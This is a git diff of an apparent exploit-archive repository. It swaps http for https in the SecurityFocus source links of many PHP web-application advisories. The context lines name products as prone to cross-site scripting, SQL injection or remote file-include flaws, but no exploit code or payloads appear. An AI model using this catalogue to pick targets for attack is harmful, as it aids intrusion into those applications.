-1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15936/info +source: https://www.securityfocus.com/bid/15936/info Box UK Amaxus CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26878.txt b/exploits/php/webapps/26878.txt index 359485845..a28f0d0cf 100644 --- a/exploits/php/webapps/26878.txt +++ b/exploits/php/webapps/26878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15939/info +source: https://www.securityfocus.com/bid/15939/info Caravel CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26879.txt b/exploits/php/webapps/26879.txt index a4016c220..7058001e6 100644 --- a/exploits/php/webapps/26879.txt +++ b/exploits/php/webapps/26879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15940/info +source: https://www.securityfocus.com/bid/15940/info Cofax is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26880.txt b/exploits/php/webapps/26880.txt index 270d84a75..1982223d5 100644 --- a/exploits/php/webapps/26880.txt +++ b/exploits/php/webapps/26880.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15947/info +source: https://www.securityfocus.com/bid/15947/info FLIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26881.txt b/exploits/php/webapps/26881.txt index 57fff5c9d..bbd4eea0d 100644 --- a/exploits/php/webapps/26881.txt +++ b/exploits/php/webapps/26881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15947/info +source: https://www.securityfocus.com/bid/15947/info FLIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26883.txt b/exploits/php/webapps/26883.txt index 0e32000cf..3ede0f2b6 100644 --- a/exploits/php/webapps/26883.txt +++ b/exploits/php/webapps/26883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15950/info +source: https://www.securityfocus.com/bid/15950/info Enterprise CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26884.txt b/exploits/php/webapps/26884.txt index 18fda6ebc..a1e891582 100644 --- a/exploits/php/webapps/26884.txt +++ b/exploits/php/webapps/26884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15951/info +source: https://www.securityfocus.com/bid/15951/info Liferay Portal Enterprise is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26885.txt b/exploits/php/webapps/26885.txt index e317be2c2..5d2461c8d 100644 --- a/exploits/php/webapps/26885.txt +++ b/exploits/php/webapps/26885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15952/info +source: https://www.securityfocus.com/bid/15952/info Lighthouse is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26895.txt b/exploits/php/webapps/26895.txt index 0bcb42d81..4f144a3b8 100644 --- a/exploits/php/webapps/26895.txt +++ b/exploits/php/webapps/26895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15954/info +source: https://www.securityfocus.com/bid/15954/info Magnolia Content Management Suite is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26896.txt b/exploits/php/webapps/26896.txt index 9402ce38e..a932a29d2 100644 --- a/exploits/php/webapps/26896.txt +++ b/exploits/php/webapps/26896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15956/info +source: https://www.securityfocus.com/bid/15956/info ContentServ is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26897.txt b/exploits/php/webapps/26897.txt index 1147e91cb..1143cb1f5 100644 --- a/exploits/php/webapps/26897.txt +++ b/exploits/php/webapps/26897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15957/info +source: https://www.securityfocus.com/bid/15957/info Direct News is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26898.txt b/exploits/php/webapps/26898.txt index d7710203f..a3d5daeb4 100644 --- a/exploits/php/webapps/26898.txt +++ b/exploits/php/webapps/26898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15958/info +source: https://www.securityfocus.com/bid/15958/info ODFaq is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26899.txt b/exploits/php/webapps/26899.txt index d83621d05..637b715e7 100644 --- a/exploits/php/webapps/26899.txt +++ b/exploits/php/webapps/26899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15959/info +source: https://www.securityfocus.com/bid/15959/info Marwel is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26900.txt b/exploits/php/webapps/26900.txt index 13e77b18a..18d9a2769 100644 --- a/exploits/php/webapps/26900.txt +++ b/exploits/php/webapps/26900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15960/info +source: https://www.securityfocus.com/bid/15960/info Miraserver is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26901.txt b/exploits/php/webapps/26901.txt index 5239bde76..70ea0e6b2 100644 --- a/exploits/php/webapps/26901.txt +++ b/exploits/php/webapps/26901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15960/info +source: https://www.securityfocus.com/bid/15960/info Miraserver is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26902.txt b/exploits/php/webapps/26902.txt index e67fc5fe8..b3a024ae7 100644 --- a/exploits/php/webapps/26902.txt +++ b/exploits/php/webapps/26902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15960/info +source: https://www.securityfocus.com/bid/15960/info Miraserver is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26904.txt b/exploits/php/webapps/26904.txt index c82783f06..a403877a0 100644 --- a/exploits/php/webapps/26904.txt +++ b/exploits/php/webapps/26904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26905.txt b/exploits/php/webapps/26905.txt index 884cf18e1..fd5642076 100644 --- a/exploits/php/webapps/26905.txt +++ b/exploits/php/webapps/26905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26906.txt b/exploits/php/webapps/26906.txt index 65fa81493..be4299079 100644 --- a/exploits/php/webapps/26906.txt +++ b/exploits/php/webapps/26906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26907.txt b/exploits/php/webapps/26907.txt index b246ec2c2..bba909b36 100644 --- a/exploits/php/webapps/26907.txt +++ b/exploits/php/webapps/26907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26908.txt b/exploits/php/webapps/26908.txt index bc17c5caf..8d6865347 100644 --- a/exploits/php/webapps/26908.txt +++ b/exploits/php/webapps/26908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26911.txt b/exploits/php/webapps/26911.txt index 31b1aaaad..d3e1a1247 100644 --- a/exploits/php/webapps/26911.txt +++ b/exploits/php/webapps/26911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15966/info +source: https://www.securityfocus.com/bid/15966/info Komodo CMS is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26912.txt b/exploits/php/webapps/26912.txt index 2c50cfe67..78b9078ab 100644 --- a/exploits/php/webapps/26912.txt +++ b/exploits/php/webapps/26912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15967/info +source: https://www.securityfocus.com/bid/15967/info Mercury CMS is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26916.txt b/exploits/php/webapps/26916.txt index 9e10714a6..4510983c3 100644 --- a/exploits/php/webapps/26916.txt +++ b/exploits/php/webapps/26916.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15984/info +source: https://www.securityfocus.com/bid/15984/info Enterprise Connector is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26918.txt b/exploits/php/webapps/26918.txt index b2e779ac5..dd74e9dfc 100644 --- a/exploits/php/webapps/26918.txt +++ b/exploits/php/webapps/26918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15992/info +source: https://www.securityfocus.com/bid/15992/info Plogger is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/26919.txt b/exploits/php/webapps/26919.txt index 021bc9c53..254d0784a 100644 --- a/exploits/php/webapps/26919.txt +++ b/exploits/php/webapps/26919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15993/info +source: https://www.securityfocus.com/bid/15993/info D-Man is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'title' parameter. diff --git a/exploits/php/webapps/26921.txt b/exploits/php/webapps/26921.txt index 70cf7db9e..a0942509a 100644 --- a/exploits/php/webapps/26921.txt +++ b/exploits/php/webapps/26921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16000/info +source: https://www.securityfocus.com/bid/16000/info Tolva is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/26923.txt b/exploits/php/webapps/26923.txt index d24983a07..95dea45b2 100644 --- a/exploits/php/webapps/26923.txt +++ b/exploits/php/webapps/26923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16002/info +source: https://www.securityfocus.com/bid/16002/info Beehive Forum is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26925.txt b/exploits/php/webapps/26925.txt index e26bc7158..2fa0204ef 100644 --- a/exploits/php/webapps/26925.txt +++ b/exploits/php/webapps/26925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16005/info +source: https://www.securityfocus.com/bid/16005/info papaya CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26938.txt b/exploits/php/webapps/26938.txt index 50fa6383c..2286bad18 100644 --- a/exploits/php/webapps/26938.txt +++ b/exploits/php/webapps/26938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16014/info +source: https://www.securityfocus.com/bid/16014/info Scoop is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26939.txt b/exploits/php/webapps/26939.txt index fbd9f4255..8fa3d3a16 100644 --- a/exploits/php/webapps/26939.txt +++ b/exploits/php/webapps/26939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16014/info +source: https://www.securityfocus.com/bid/16014/info Scoop is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26959.txt b/exploits/php/webapps/26959.txt index fc4cbb5e7..e5e7fe77c 100644 --- a/exploits/php/webapps/26959.txt +++ b/exploits/php/webapps/26959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16020/info +source: https://www.securityfocus.com/bid/16020/info Papoo is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26960.txt b/exploits/php/webapps/26960.txt index 53c9982c6..2ba971ea5 100644 --- a/exploits/php/webapps/26960.txt +++ b/exploits/php/webapps/26960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16020/info +source: https://www.securityfocus.com/bid/16020/info Papoo is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26961.txt b/exploits/php/webapps/26961.txt index 0429e57e4..3d5b5c9de 100644 --- a/exploits/php/webapps/26961.txt +++ b/exploits/php/webapps/26961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16020/info +source: https://www.securityfocus.com/bid/16020/info Papoo is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26962.txt b/exploits/php/webapps/26962.txt index 79a11ce3e..2976d9ba9 100644 --- a/exploits/php/webapps/26962.txt +++ b/exploits/php/webapps/26962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16021/info +source: https://www.securityfocus.com/bid/16021/info phpSlash is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26965.txt b/exploits/php/webapps/26965.txt index ff05e2981..9056f96fc 100644 --- a/exploits/php/webapps/26965.txt +++ b/exploits/php/webapps/26965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16030/info +source: https://www.securityfocus.com/bid/16030/info MusicBox is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26968.txt b/exploits/php/webapps/26968.txt index cc3b01e60..830c1665c 100644 --- a/exploits/php/webapps/26968.txt +++ b/exploits/php/webapps/26968.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16033/info +source: https://www.securityfocus.com/bid/16033/info SyntaxCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26973.txt b/exploits/php/webapps/26973.txt index e464e9751..dc509cc89 100644 --- a/exploits/php/webapps/26973.txt +++ b/exploits/php/webapps/26973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16062/info +source: https://www.securityfocus.com/bid/16062/info Cerberus Helpdesk is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are the result of inadequate validation of user-supplied input that will be included in site output or in SQL queries. diff --git a/exploits/php/webapps/26974.txt b/exploits/php/webapps/26974.txt index 23f7fdc63..832dfcf65 100644 --- a/exploits/php/webapps/26974.txt +++ b/exploits/php/webapps/26974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16062/info +source: https://www.securityfocus.com/bid/16062/info Cerberus Helpdesk is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are the result of inadequate validation of user-supplied input that will be included in site output or in SQL queries. diff --git a/exploits/php/webapps/26975.txt b/exploits/php/webapps/26975.txt index 7e9c77b96..4a282ae90 100644 --- a/exploits/php/webapps/26975.txt +++ b/exploits/php/webapps/26975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16062/info +source: https://www.securityfocus.com/bid/16062/info Cerberus Helpdesk is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are the result of inadequate validation of user-supplied input that will be included in site output or in SQL queries. diff --git a/exploits/php/webapps/26976.txt b/exploits/php/webapps/26976.txt index 70ab3ef51..2b1cd7116 100644 --- a/exploits/php/webapps/26976.txt +++ b/exploits/php/webapps/26976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16063/info +source: https://www.securityfocus.com/bid/16063/info Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks. diff --git a/exploits/php/webapps/26977.txt b/exploits/php/webapps/26977.txt index 90deb5540..f1631f7b5 100644 --- a/exploits/php/webapps/26977.txt +++ b/exploits/php/webapps/26977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16063/info +source: https://www.securityfocus.com/bid/16063/info Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks. diff --git a/exploits/php/webapps/26978.txt b/exploits/php/webapps/26978.txt index b94787f0c..29869d46b 100644 --- a/exploits/php/webapps/26978.txt +++ b/exploits/php/webapps/26978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16063/info +source: https://www.securityfocus.com/bid/16063/info Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks. diff --git a/exploits/php/webapps/26979.txt b/exploits/php/webapps/26979.txt index ea02594e0..a78b07937 100644 --- a/exploits/php/webapps/26979.txt +++ b/exploits/php/webapps/26979.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26980.txt b/exploits/php/webapps/26980.txt index ba16722cc..81b6ec817 100644 --- a/exploits/php/webapps/26980.txt +++ b/exploits/php/webapps/26980.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26981.txt b/exploits/php/webapps/26981.txt index 2f2f06d67..dcb16a3ff 100644 --- a/exploits/php/webapps/26981.txt +++ b/exploits/php/webapps/26981.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26982.txt b/exploits/php/webapps/26982.txt index 7d3f5041d..7539c5c32 100644 --- a/exploits/php/webapps/26982.txt +++ b/exploits/php/webapps/26982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26983.txt b/exploits/php/webapps/26983.txt index 14baa3553..6289bd991 100644 --- a/exploits/php/webapps/26983.txt +++ b/exploits/php/webapps/26983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26984.txt b/exploits/php/webapps/26984.txt index 2809f6276..26be6184a 100644 --- a/exploits/php/webapps/26984.txt +++ b/exploits/php/webapps/26984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26988.txt b/exploits/php/webapps/26988.txt index 0fc0a45cd..6568c75af 100644 --- a/exploits/php/webapps/26988.txt +++ b/exploits/php/webapps/26988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16078/info +source: https://www.securityfocus.com/bid/16078/info Koobi is prone to a script injection vulnerability. diff --git a/exploits/php/webapps/26989.txt b/exploits/php/webapps/26989.txt index 03c19a0a2..8c9fb2a5a 100644 --- a/exploits/php/webapps/26989.txt +++ b/exploits/php/webapps/26989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16081/info +source: https://www.securityfocus.com/bid/16081/info GMailSite is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/26990.txt b/exploits/php/webapps/26990.txt index 01f574ba8..be7910b94 100644 --- a/exploits/php/webapps/26990.txt +++ b/exploits/php/webapps/26990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16082/info +source: https://www.securityfocus.com/bid/16082/info MyBB is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26992.txt b/exploits/php/webapps/26992.txt index b0f30a3c3..bdccd58f8 100644 --- a/exploits/php/webapps/26992.txt +++ b/exploits/php/webapps/26992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16090/info +source: https://www.securityfocus.com/bid/16090/info Ades Design AdesGuestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26993.txt b/exploits/php/webapps/26993.txt index 46fa0c59f..111b10511 100644 --- a/exploits/php/webapps/26993.txt +++ b/exploits/php/webapps/26993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16091/info +source: https://www.securityfocus.com/bid/16091/info OOApp Guestbook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26994.txt b/exploits/php/webapps/26994.txt index ea9b6149f..c92df349c 100644 --- a/exploits/php/webapps/26994.txt +++ b/exploits/php/webapps/26994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16094/info +source: https://www.securityfocus.com/bid/16094/info Kayako SupportSuite is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/26995.txt b/exploits/php/webapps/26995.txt index b2af674e4..b51f4168e 100644 --- a/exploits/php/webapps/26995.txt +++ b/exploits/php/webapps/26995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16101/info +source: https://www.securityfocus.com/bid/16101/info phpDocumentor is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26998.txt b/exploits/php/webapps/26998.txt index 0f09f73b3..d6b1d5755 100644 --- a/exploits/php/webapps/26998.txt +++ b/exploits/php/webapps/26998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16105/info +source: https://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. diff --git a/exploits/php/webapps/26999.txt b/exploits/php/webapps/26999.txt index dd0154926..580ea9ee5 100644 --- a/exploits/php/webapps/26999.txt +++ b/exploits/php/webapps/26999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16106/info +source: https://www.securityfocus.com/bid/16106/info phpBook is prone to a vulnerability that may let remote attackers inject arbitrary PHP code into the application. This code may then be executed by visiting pages that include the injected code. diff --git a/exploits/php/webapps/27000.txt b/exploits/php/webapps/27000.txt index 2a3528838..6f831bbac 100644 --- a/exploits/php/webapps/27000.txt +++ b/exploits/php/webapps/27000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16107/info +source: https://www.securityfocus.com/bid/16107/info VEGO Web Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27001.txt b/exploits/php/webapps/27001.txt index 1c8b6aff8..eb998ff99 100644 --- a/exploits/php/webapps/27001.txt +++ b/exploits/php/webapps/27001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16108/info +source: https://www.securityfocus.com/bid/16108/info VEGO Links Builder is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27002.txt b/exploits/php/webapps/27002.txt index 7a4b97546..6314aabb0 100644 --- a/exploits/php/webapps/27002.txt +++ b/exploits/php/webapps/27002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16109/info +source: https://www.securityfocus.com/bid/16109/info Jevontech PHPenpals is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27003.txt b/exploits/php/webapps/27003.txt index 1f08dd95d..91a4de93b 100644 --- a/exploits/php/webapps/27003.txt +++ b/exploits/php/webapps/27003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16110/info +source: https://www.securityfocus.com/bid/16110/info inTouch is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27004.txt b/exploits/php/webapps/27004.txt index b7d1b1989..17fce1df7 100644 --- a/exploits/php/webapps/27004.txt +++ b/exploits/php/webapps/27004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16111/info +source: https://www.securityfocus.com/bid/16111/info PHPjournaler is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27015.txt b/exploits/php/webapps/27015.txt index 99132a02c..3ecd29f52 100644 --- a/exploits/php/webapps/27015.txt +++ b/exploits/php/webapps/27015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16112/info +source: https://www.securityfocus.com/bid/16112/info Chipmunk Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27016.txt b/exploits/php/webapps/27016.txt index 678ac1aae..9ff97efbb 100644 --- a/exploits/php/webapps/27016.txt +++ b/exploits/php/webapps/27016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16113/info +source: https://www.securityfocus.com/bid/16113/info Chimera Web Portal is prone to multiple input validation vulnerabilities. The issues include cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27017.txt b/exploits/php/webapps/27017.txt index 27998eb67..81a2c77cc 100644 --- a/exploits/php/webapps/27017.txt +++ b/exploits/php/webapps/27017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16113/info +source: https://www.securityfocus.com/bid/16113/info Chimera Web Portal is prone to multiple input validation vulnerabilities. The issues include cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27018.txt b/exploits/php/webapps/27018.txt index c3e4165e8..8dd646f50 100644 --- a/exploits/php/webapps/27018.txt +++ b/exploits/php/webapps/27018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16115/info +source: https://www.securityfocus.com/bid/16115/info ScozNet ScozBook is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27019.txt b/exploits/php/webapps/27019.txt index 96205ad6a..d81726913 100644 --- a/exploits/php/webapps/27019.txt +++ b/exploits/php/webapps/27019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16116/info +source: https://www.securityfocus.com/bid/16116/info vBulletin is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27020.txt b/exploits/php/webapps/27020.txt index acee3e144..e55fb0027 100644 --- a/exploits/php/webapps/27020.txt +++ b/exploits/php/webapps/27020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16117/info +source: https://www.securityfocus.com/bid/16117/info Drupal is prone to an HTML injection vulnerability when handling URL-encoded HTML and script code in message content. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27022.txt b/exploits/php/webapps/27022.txt index a1cbba426..91575fb58 100644 --- a/exploits/php/webapps/27022.txt +++ b/exploits/php/webapps/27022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16121/info +source: https://www.securityfocus.com/bid/16121/info Bugport is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27023.txt b/exploits/php/webapps/27023.txt index 922a143d1..8efbaec1d 100644 --- a/exploits/php/webapps/27023.txt +++ b/exploits/php/webapps/27023.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16123/info +source: https://www.securityfocus.com/bid/16123/info Bugport is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27025.txt b/exploits/php/webapps/27025.txt index 9a9f99022..22777f3b8 100644 --- a/exploits/php/webapps/27025.txt +++ b/exploits/php/webapps/27025.txt @@ -1,4 +1,4 @@ -source: 